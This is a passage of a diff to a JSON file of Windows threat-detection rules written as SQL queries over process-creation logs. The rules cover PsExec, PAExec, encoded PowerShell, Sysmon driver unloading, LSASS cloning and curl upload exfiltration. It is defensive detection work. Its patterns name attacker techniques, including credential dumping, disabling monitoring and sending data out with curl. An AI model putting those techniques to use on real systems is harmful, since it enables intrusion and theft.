"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 
'psexesvc.exe'))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Legitimate use by administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Renamed PAExec Execution", + "id": 
"c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.t1202" ], "falsepositives": [ - "Administrative script libraries" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": 
"b2309017-4235-44fe-b5af-b15363011957", + "title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "WindowsApps installing updates via the quiet flag" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": 
"90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", + "title": "Potential Encoded PowerShell Patterns In CommandLine", + "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE 
'%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND (CommandLine LIKE '%ToChar%' ESCAPE '\\' OR CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_encoding_patterns.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": 
"8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { - "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": "47e4bab7-c626-47dc-967b-255608c9a920", - "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. 
This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. 
Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' 